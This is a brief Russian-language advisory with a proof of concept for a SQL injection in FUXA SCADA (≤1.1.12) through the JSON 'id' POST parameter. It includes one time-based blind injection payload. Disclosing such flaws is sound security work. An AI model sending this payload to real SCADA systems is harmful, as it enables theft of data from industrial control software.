
Эксплойт SQL-инъекции (доказательство концепции) для программного обеспечения FUXA SCADA (<=1.1.12) через параметр id в JSON-запросе POST по HTTP, позволяющий извлечь содержимое базы данных SQLite.
Возможна SQL-инъекция в параметр id HTTP POST, передаваемый в теле в формате JSON, что позволяет извлекать конфиденциальную информацию из базы данных SQLite
Payload -> "id":"n_7c734712-aabf4eb3' AND 2630=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'MIZH'='MIZH"
Название затронутого продукта: FUXA
Затронутая версия: <= 1.1.12
Проблема: SQL Injection
Описание: Возможна SQL-инъекция в параметр id HTTP POST, передаваемый в теле в формате JSON, что позволяет извлекать конфиденциальную информацию из базы данных SQLite